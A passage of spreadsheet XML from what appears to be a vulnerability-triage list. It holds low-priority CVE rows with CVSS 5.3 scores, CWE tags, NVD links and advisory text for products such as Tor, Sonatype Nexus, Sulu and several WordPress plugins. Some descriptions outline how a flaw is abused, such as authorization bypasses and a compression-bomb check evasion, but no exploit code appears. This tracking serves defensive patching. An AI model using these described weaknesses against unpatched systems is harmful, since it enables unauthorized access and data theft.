t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56704</t></is></c></row><row r="2124"><c r="A2124" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2124" s="5" t="inlineStr"><is><t>CVE-2026-70575</t></is></c><c r="D2124" s="5" t="n"><v>5.3</v></c><c r="E2124" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2124" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2124" s="5" t="inlineStr" /><c r="H2124" s="5" t="n"><v>0.008</v></c><c r="I2124" s="5" t="inlineStr" /><c r="J2124" s="5" t="inlineStr" /><c r="K2124" s="5" t="inlineStr" /><c r="L2124" s="5" t="inlineStr" /><c r="M2124" s="5" t="inlineStr" /><c r="N2124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2124" s="5" t="inlineStr" /><c r="Q2124" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R2124" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Schannel allows an authorized attacker to deny service over a network.</t></is></c><c r="S2124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70575</t></is></c></row><row r="2125"><c r="A2125" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2125" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2125" s="5" t="inlineStr"><is><t>CVE-2026-71216</t></is></c><c r="D2125" s="5" t="n"><v>5.3</v></c><c r="E2125" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2125" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2125" s="5" t="inlineStr" /><c r="H2125" s="5" t="n"><v>0.001</v></c><c r="I2125" s="5" t="inlineStr" /><c r="J2125" s="5" t="inlineStr" /><c r="K2125" s="5" t="inlineStr" /><c r="L2125" s="5" t="inlineStr" /><c r="M2125" s="5" t="inlineStr" /><c r="N2125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2125" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2125" s="5" t="inlineStr" /><c r="Q2125" s="5" t="inlineStr"><is><t>CWE-319</t></is></c><c r="R2125" s="5" t="inlineStr"><is><t>PagerDuty alarm hook transmits the integration routing key over cleartext HTTP.



PagerDuty serves this endpoint over HTTPS and will
normally answer plain HTTP with a redirect. That does not remove the exposure.
The initial POST -- including the JSON body containing the routing key -- is
written to the socket unencrypted before any redirect response is received.
Redirection affects only whether the request is retried securely, not whether
the first copy left the host in the clear.



This issue affects Apache SkyWalking: from 9.6.0 through 11.0.0.



Users are recommended to upgrade to version 11.0.0, which fixes the issue.</t></is></c><c r="S2125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71216</t></is></c></row><row r="2126"><c r="A2126" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2126" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2126" s="5" t="inlineStr"><is><t>CVE-2026-77121</t></is></c><c r="D2126" s="5" t="n"><v>5.3</v></c><c r="E2126" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2126" s="5" t="inlineStr"><is><t>103e4ec9-0a87-450b-af77-479448ddef11</t></is></c><c r="G2126" s="5" t="inlineStr" /><c r="H2126" s="5" t="n"><v>0.002</v></c><c r="I2126" s="5" t="inlineStr" /><c r="J2126" s="5" t="inlineStr" /><c r="K2126" s="5" t="inlineStr" /><c r="L2126" s="5" t="inlineStr" /><c r="M2126" s="5" t="inlineStr" /><c r="N2126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2126" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P2126" s="5" t="inlineStr" /><c r="Q2126" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R2126" s="5" t="inlineStr"><is><t>A user account with permission to deploy artifacts to a hosted Maven repository could upload a POM file containing an oversized metadata field. This causes future attempts to list or browse that repository's components to permanently fail until an administrator repairs the underlying data. Only the targeted repository is affected; other repositories and overall server health remain unaffected.</t></is></c><c r="S2126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77121</t></is></c></row><row r="2127"><c r="A2127" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2127" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2127" s="5" t="inlineStr"><is><t>CVE-2026-77122</t></is></c><c r="D2127" s="5" t="n"><v>5.3</v></c><c r="E2127" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2127" s="5" t="inlineStr"><is><t>103e4ec9-0a87-450b-af77-479448ddef11</t></is></c><c r="G2127" s="5" t="inlineStr" /><c r="H2127" s="5" t="n"><v>0.002</v></c><c r="I2127" s="5" t="inlineStr" /><c r="J2127" s="5" t="inlineStr" /><c r="K2127" s="5" t="inlineStr" /><c r="L2127" s="5" t="inlineStr" /><c r="M2127" s="5" t="inlineStr" /><c r="N2127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2127" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P2127" s="5" t="inlineStr" /><c r="Q2127" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2127" s="5" t="inlineStr"><is><t>An authorization flaw in the REST API repository details endpoint (GET /service/rest/v1/repositories/{repositoryName}) in Sonatype Nexus Repository 3 allowed an account holding read or browse permission on a group repository to retrieve metadata for member repositories on which it held no direct permission, by requesting the endpoint directly for the member repository name. For proxy repositories, the disclosed metadata includes the configured remote URL, which may reveal internal upstream hostnames. This includes the anonymous user if it has been granted this permission; whether the anonymous user holds this permission depends on the role and permission configuration of the specific installation.</t></is></c><c r="S2127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77122</t></is></c></row><row r="2128"><c r="A2128" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2128" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2128" s="5" t="inlineStr"><is><t>CVE-2026-77132</t></is></c><c r="D2128" s="5" t="n"><v>5.3</v></c><c r="E2128" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2128" s="5" t="inlineStr"><is><t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t></is></c><c r="G2128" s="5" t="inlineStr" /><c r="H2128" s="5" t="n"><v>0.004</v></c><c r="I2128" s="5" t="inlineStr" /><c r="J2128" s="5" t="inlineStr" /><c r="K2128" s="5" t="inlineStr" /><c r="L2128" s="5" t="inlineStr" /><c r="M2128" s="5" t="inlineStr" /><c r="N2128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2128" s="5" t="inlineStr" /><c r="Q2128" s="5" t="inlineStr"><is><t>CWE-200, CWE-862</t></is></c><c r="R2128" s="5" t="inlineStr"><is><t>It has been discovered that several AJAX routes used for the backend localization wizard failed to perform authorization checks. This allowed authenticated, low-privileged backend users to access information about records and content elements that fall outside of their permitted range. Exploiting this vulnerability requires a low-privileged backend user account. This issue affects TYPO3 CMS versions 10.0.0-10.4.59, 11.0.0-11.5.53, 12.0.0-12.4.48, 13.0.0-13.4.34 and 14.0.0-14.3.6.</t></is></c><c r="S2128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77132</t></is></c></row><row r="2129"><c r="A2129" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2129" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2129" s="5" t="inlineStr"><is><t>CVE-2026-77639</t></is></c><c r="D2129" s="5" t="n"><v>5.3</v></c><c r="E2129" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2129" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G2129" s="5" t="inlineStr" /><c r="H2129" s="5" t="n"><v>0.002</v></c><c r="I2129" s="5" t="inlineStr" /><c r="J2129" s="5" t="inlineStr" /><c r="K2129" s="5" t="inlineStr"><is><t>torproject:tor</t></is></c><c r="L2129" s="5" t="inlineStr" /><c r="M2129" s="5" t="inlineStr" /><c r="N2129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2129" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P2129" s="5" t="inlineStr" /><c r="Q2129" s="5" t="inlineStr"><is><t>CWE-420</t></is></c><c r="R2129" s="5" t="inlineStr"><is><t>Tor before 0.4.9.9 was prone to a compression bomb bypass where an attacker could concatenate many gzip or zlib sub-streams, each just under the per-stream detection threshold, to avoid the compression bomb check entirely. This is TROVE-2026-022.</t></is></c><c r="S2129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77639</t></is></c></row><row r="2130"><c r="A2130" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2130" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2130" s="5" t="inlineStr"><is><t>CVE-2026-77640</t></is></c><c r="D2130" s="5" t="n"><v>5.3</v></c><c r="E2130" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2130" s="5" t="inlineStr" /><c r="H2130" s="5" t="n"><v>0.002</v></c><c r="I2130" s="5" t="inlineStr" /><c r="J2130" s="5" t="inlineStr" /><c r="K2130" s="5" t="inlineStr"><is><t>torproject:tor</t></is></c><c r="L2130" s="5" t="inlineStr" /><c r="M2130" s="5" t="inlineStr" /><c r="N2130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2130" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P2130" s="5" t="inlineStr" /><c r="Q2130" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="R2130" s="5" t="inlineStr"><is><t>tor before 0.4.9.9 was prone to an infinite loop when decompressing a truncated zlib/gzip  stream with done=1. A truncated stream never reaches Z_STREAM_END,  causing zlib to return Z_BUF_ERROR with no input remaining, which  buf_add_compress() mistook for a full output buffer and retried forever. Fixed by returning TOR_COMPRESS_ERROR in that case so the caller can abort cleanly. This is TROVE-2026-021.</t></is></c><c r="S2130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77640</t></is></c></row><row r="2131"><c r="A2131" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2131" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2131" s="5" t="inlineStr"><is><t>CVE-2026-78149</t></is></c><c r="D2131" s="5" t="n"><v>5.3</v></c><c r="E2131" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2131" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2131" s="5" t="inlineStr" /><c r="H2131" s="5" t="n"><v>0.003</v></c><c r="I2131" s="5" t="inlineStr" /><c r="J2131" s="5" t="inlineStr" /><c r="K2131" s="5" t="inlineStr" /><c r="L2131" s="5" t="inlineStr" /><c r="M2131" s="5" t="inlineStr" /><c r="N2131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2131" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2131" s="5" t="inlineStr" /><c r="Q2131" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R2131" s="5" t="inlineStr"><is><t>The Smart Post  WordPress plugin before 4.0.8 does not check whether a post is password protected before returning its content and its stored password through an unauthenticated AJAX action, allowing unauthenticated users to read protected post content and the password that guards it.</t></is></c><c r="S2131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78149</t></is></c></row><row r="2132"><c r="A2132" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2132" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2132" s="5" t="inlineStr"><is><t>CVE-2026-78446</t></is></c><c r="D2132" s="5" t="n"><v>5.3</v></c><c r="E2132" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2132" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2132" s="5" t="inlineStr" /><c r="H2132" s="5" t="n"><v>0.006</v></c><c r="I2132" s="5" t="inlineStr" /><c r="J2132" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K213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132" s="5" t="inlineStr" /><c r="M2132" s="5" t="inlineStr" /><c r="N2132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2132" s="5" t="inlineStr" /><c r="Q2132" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R2132" s="5" t="inlineStr"><is><t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t></is></c><c r="S2132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t></is></c></row><row r="2133"><c r="A2133" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2133" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2133" s="5" t="inlineStr"><is><t>CVE-2026-78602</t></is></c><c r="D2133" s="5" t="n"><v>5.3</v></c><c r="E2133" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2133" s="5" t="inlineStr"><is><t>security@elastic.co</t></is></c><c r="G2133" s="5" t="inlineStr" /><c r="H2133" s="5" t="n"><v>0.004</v></c><c r="I2133" s="5" t="inlineStr" /><c r="J2133" s="5" t="inlineStr"><is><t>elastic</t></is></c><c r="K2133" s="5" t="inlineStr"><is><t>elastic:maps_server</t></is></c><c r="L2133" s="5" t="inlineStr" /><c r="M2133" s="5" t="inlineStr" /><c r="N2133" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2133" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P2133" s="5" t="inlineStr" /><c r="Q2133" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R2133" s="5" t="inlineStr"><is><t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22) in Elastic Maps Server can lead to information disclosure via Path Traversal (CAPEC-126). An unauthenticated attacker able to reach the service over the network could cause it to return the contents of files outside its intended content directory that are readable by the server process.</t></is></c><c r="S2133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78602</t></is></c></row><row r="2134"><c r="A2134" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2134" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2134" s="5" t="inlineStr"><is><t>CVE-2026-78631</t></is></c><c r="D2134" s="5" t="n"><v>5.3</v></c><c r="E2134" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2134" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G2134" s="5" t="inlineStr" /><c r="H2134" s="5" t="n"><v>0.001</v></c><c r="I2134" s="5" t="inlineStr" /><c r="J2134" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K2134" s="5" t="inlineStr" /><c r="L2134" s="5" t="inlineStr" /><c r="M2134" s="5" t="inlineStr" /><c r="N2134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2134" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2134" s="5" t="inlineStr" /><c r="Q2134" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="R2134" s="5" t="inlineStr"><is><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is></c><c r="S2134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78631</t></is></c></row><row r="2135"><c r="A2135" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2135" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2135" s="5" t="inlineStr"><is><t>CVE-2026-79630</t></is></c><c r="D2135" s="5" t="n"><v>5.3</v></c><c r="E2135" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2135" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2135" s="5" t="inlineStr" /><c r="H2135" s="5" t="n"><v>0.002</v></c><c r="I2135" s="5" t="inlineStr" /><c r="J2135" s="5" t="inlineStr" /><c r="K2135" s="5" t="inlineStr" /><c r="L2135" s="5" t="inlineStr" /><c r="M2135" s="5" t="inlineStr" /><c r="N2135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2135" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2135" s="5" t="inlineStr" /><c r="Q2135" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R2135" s="5" t="inlineStr"><is><t>The WPFunnels  WordPress plugin before 3.13.0 does not verify that the product requested through a checkout order bump is the product that bump's discount was configured for, allowing unauthenticated users to obtain any purchasable product at a discount intended for a different one, with the reduced price carried through to the total of the order they place.</t></is></c><c r="S2135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79630</t></is></c></row><row r="2136"><c r="A2136" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2136" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2136" s="5" t="inlineStr"><is><t>CVE-2026-79631</t></is></c><c r="D2136" s="5" t="n"><v>5.3</v></c><c r="E2136" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2136" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2136" s="5" t="inlineStr" /><c r="H2136" s="5" t="n"><v>0.002</v></c><c r="I2136" s="5" t="inlineStr" /><c r="J2136" s="5" t="inlineStr" /><c r="K2136" s="5" t="inlineStr" /><c r="L2136" s="5" t="inlineStr" /><c r="M2136" s="5" t="inlineStr" /><c r="N2136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2136" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2136" s="5" t="inlineStr" /><c r="Q2136" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R2136" s="5" t="inlineStr"><is><t>The WPFunnels  WordPress plugin before 3.13.0 does not restrict access to the log files it writes to a predictable location under the public uploads directory, allowing unauthenticated users to download customer order details and opt-in form submissions when logging is enabled.</t></is></c><c r="S2136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79631</t></is></c></row><row r="2137"><c r="A2137" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2137" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2137" s="5" t="inlineStr"><is><t>CVE-2026-79632</t></is></c><c r="D2137" s="5" t="n"><v>5.3</v></c><c r="E2137" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2137" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2137" s="5" t="inlineStr" /><c r="H2137" s="5" t="n"><v>0.002</v></c><c r="I2137" s="5" t="inlineStr" /><c r="J2137" s="5" t="inlineStr" /><c r="K2137" s="5" t="inlineStr" /><c r="L2137" s="5" t="inlineStr" /><c r="M2137" s="5" t="inlineStr" /><c r="N2137" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2137" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2137" s="5" t="inlineStr" /><c r="Q2137" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2137" s="5" t="inlineStr"><is><t>The WPFunnels  WordPress plugin before 3.13.0 does not perform any authorisation or nonce check in one of its opt-in submission handlers, and takes the notification recipients and subject from the request, allowing unauthenticated users to make the site send emails to arbitrary recipients with an arbitrary subject.</t></is></c><c r="S2137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79632</t></is></c></row><row r="2138"><c r="A2138" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2138" s="5" t="inlineStr"><is><t>CVE-2026-81380</t></is></c><c r="D2138" s="5" t="n"><v>5.3</v></c><c r="E2138" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2138" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2138" s="5" t="inlineStr" /><c r="H2138" s="5" t="n"><v>0.006</v></c><c r="I2138" s="5" t="inlineStr" /><c r="J2138" s="5" t="inlineStr" /><c r="K2138" s="5" t="inlineStr" /><c r="L2138" s="5" t="inlineStr" /><c r="M2138" s="5" t="inlineStr" /><c r="N2138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2138" s="5" t="inlineStr" /><c r="Q2138" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R2138" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S2138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81380</t></is></c></row><row r="2139"><c r="A2139" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2139" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2139" s="5" t="inlineStr"><is><t>CVE-2026-81424</t></is></c><c r="D2139" s="5" t="n"><v>5.3</v></c><c r="E2139" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2139" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2139" s="5" t="inlineStr" /><c r="H2139" s="5" t="n"><v>0.002</v></c><c r="I2139" s="5" t="inlineStr" /><c r="J2139" s="5" t="inlineStr" /><c r="K2139" s="5" t="inlineStr" /><c r="L2139" s="5" t="inlineStr" /><c r="M2139" s="5" t="inlineStr" /><c r="N2139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2139" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2139" s="5" t="inlineStr" /><c r="Q2139" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R2139" s="5" t="inlineStr"><is><t>The Accept Stripe Payments WordPress plugin before 2.1.4 does not verify that the product fulfilled when a checkout is completed matches the product the authoritative payment was actually made for, checking only that the amount paid is at least the referenced product's price, allowing unauthenticated attackers who complete a genuine payment to obtain fulfilment for a different, equal- or lower-priced product than the one they paid for.</t></is></c><c r="S2139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81424</t></is></c></row><row r="2140"><c r="A2140" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2140" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2140" s="5" t="inlineStr"><is><t>CVE-2026-82023</t></is></c><c r="D2140" s="5" t="n"><v>5.3</v></c><c r="E2140" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2140" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2140" s="5" t="inlineStr" /><c r="H2140" s="5" t="n"><v>0.002</v></c><c r="I2140" s="5" t="inlineStr" /><c r="J2140" s="5" t="inlineStr" /><c r="K2140" s="5" t="inlineStr" /><c r="L2140" s="5" t="inlineStr" /><c r="M2140" s="5" t="inlineStr" /><c r="N2140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2140" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2140" s="5" t="inlineStr" /><c r="Q2140" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2140" s="5" t="inlineStr"><is><t>LearnPress WordPress Plugin before 4.4.6 contains a broken object-level authorization vulnerability that allows authenticated attackers with the Instructor role to add answers to quiz questions owned by other instructors by exploiting a missing ownership check on the question answer insert path. Attackers can supply arbitrary question identifiers during answer insertion, bypassing instructor-boundary restrictions to persistently modify quiz content across courses they do not own.</t></is></c><c r="S2140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82023</t></is></c></row><row r="2141"><c r="A2141" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2141" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2141" s="5" t="inlineStr"><is><t>CVE-2026-82394</t></is></c><c r="D2141" s="5" t="n"><v>5.3</v></c><c r="E2141" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2141" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2141" s="5" t="inlineStr" /><c r="H2141" s="5" t="n"><v>0.003</v></c><c r="I2141" s="5" t="inlineStr" /><c r="J2141" s="5" t="inlineStr" /><c r="K2141" s="5" t="inlineStr" /><c r="L2141" s="5" t="inlineStr" /><c r="M2141" s="5" t="inlineStr" /><c r="N2141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2141" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2141" s="5" t="inlineStr" /><c r="Q2141" s="5" t="inlineStr"><is><t>CWE-862, CWE-863</t></is></c><c r="R2141" s="5" t="inlineStr"><is><t>Sulu is an open-source PHP content management system based on the Symfony framework. Prior to versions 2.6.25 and 3.0.8, the preview-link endpoint and src/Sulu/Bundle/PreviewBundle/Application/Manager/PreviewLinkManager.php do not enforce VIEW permission for the target resource in PreviewLinkManager::generate() or PreviewLinkManager::revoke(). An authenticated administration user who knows a target resource identifier can create or revoke a preview link for any page, article, or snippet, including content in a webspace or area the user cannot view. A generated preview URL is public and resolves content by an opaque token, allowing the user or anyone receiving the link to read restricted content without authentication. This issue is fixed in versions 2.6.25 and 3.0.8.</t></is></c><c r="S2141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82394</t></is></c></row><row r="2142"><c r="A2142" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2142" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2142" s="5" t="inlineStr"><is><t>CVE-2026-82395</t></is></c><c r="D2142" s="5" t="n"><v>5.3</v></c><c r="E2142" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2142" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2142" s="5" t="inlineStr" /><c r="H2142" s="5" t="n"><v>0.002</v></c><c r="I2142" s="5" t="inlineStr" /><c r="J2142" s="5" t="inlineStr" /><c r="K2142" s="5" t="inlineStr" /><c r="L2142" s="5" t="inlineStr" /><c r="M2142" s="5" t="inlineStr" /><c r="N2142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2142" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2142" s="5" t="inlineStr" /><c r="Q2142" s="5" t="inlineStr"><is><t>CWE-639, CWE-863</t></is></c><c r="R2142" s="5" t="inlineStr"><is><t>Sulu is an open-source PHP content management system based on the Symfony framework. Prior to versions 2.6.25 and 3.0.8, the media move endpoint derives its permission check from the client-supplied collection value instead of the media item's actual source collection, and src/Sulu/Bundle/MediaBundle/Media/Manager/MediaManager.php allows MediaManager::move() to reassign the item without checking that source. An authenticated backend user with edit permission on one collection and knowledge of a target media identifier can name the allowed collection in the request, move an item out of a restricted collection, and then view or download content the user was not permitted to access. This issue is fixed in versions 2.6.25 and 3.0.8.</t></is></c><c r="S2142" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82395</t></is></c></row><row r="2143"><c r="A2143" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2143" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2143" s="5" t="inlineStr"><is><t>CVE-2026-82878</t></is></c><c r="D2143" s="5" t="n"><v>5.3</v></c><c r="E2143" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2143" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2143" s="5" t="inlineStr" /><c r="H2143" s="5" t="n"><v>0.002</v></c><c r="I2143" s="5" t="inlineStr" /><c r="J2143" s="5" t="inlineStr" /><c r="K2143" s="5" t="inlineStr" /><c r="L2143" s="5" t="inlineStr" /><c r="M2143" s="5" t="inlineStr" /><c r="N2143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2143" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2143" s="5" t="inlineStr" /><c r="Q2143" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2143" s="5" t="inlineStr"><is><t>DataEase versions before 2.10.26 omit object-level authorization checks on geographic information, dashboard linkage, and chart detail REST endpoints, allowing authenticated users to access resources belonging to other users. Attackers can overwrite or delete map geometry, modify dashboard linkages, and retrieve chart metadata and configuration for resources they do not own by supplying arbitrary identifiers in requests.</t></is></c><c r="S2143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82878</t></is></c></row><row r="2144"><c r="A2144" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2144" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2144" s="5" t="inlineStr"><is><t>CVE-2026-82879</t></is></c><c r="D2144" s="5" t="n"><v>5.3</v></c><c r="E2144" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2144" s="5" 